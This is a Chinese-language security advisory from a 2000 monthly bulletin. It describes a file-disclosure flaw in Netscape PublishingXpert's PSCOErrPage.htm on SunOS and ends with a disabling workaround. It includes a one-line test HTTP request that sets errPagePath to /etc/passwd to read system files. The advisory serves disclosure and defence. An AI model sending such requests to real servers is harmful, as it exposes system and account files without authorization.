首页 -> 安全研究
安全研究
绿盟月刊
绿盟安全月刊->第8期->最新漏洞
作者:x00x00
日期:2000-04-12
发布日期: 2000-4-11
更新日期: 2000-4-11
受影响的系统:
Netscape PublishingXpert 2.* PSCOErrPage.htm
+
SunOS 5.7
SunOS 5.6
SunOS 5.5.1
--------------------------------------------------------------------------------
描述:
PSCOErrPage.htm是一个用来显示错误新的页面,当服务器发生一个错误时,通常你会
被转到类似这样的一个链接地址去:
/PSUser/PSCOErrPage.htm?errPagePath=%2Fusr%2FPublishingXpert%2F2.5%2Fbin%2Fp
suser%2Fen%2Fcommon%2FPSCO_ErrPage.pat&errMsg=PUBSYS_35202%3A++The+two+passw
ords+provided+do+not+match
这里的%2F就是"/",去掉errMsg变量的内容(它显示错误信息内容).就得到下面一个链接:
/PSUser/PSCOErrPage.htm?errPagePath=/usr/PublishingXpert/2.5/bin/psuser/en/c
ommon/PSCO_ErrPage.pat
errPagePath使用了绝对路径,因此攻击者可以改变errPagePath的路径,浏览系统文
件。(只能以web服务器的运行权限浏览)
<* 来源: \x00\x00 (x00x00x00@hotmail.com) *>
--------------------------------------------------------------------------------
测试程序:
GET /PSUser/PSCOErrPage.htm?errPagePath=/etc/passwd HTTP/1.0
--------------------------------------------------------------------------------
建议:
临时解决方法:禁止使用PSCOErrPage.htm
版权所有,未经许可,不得转载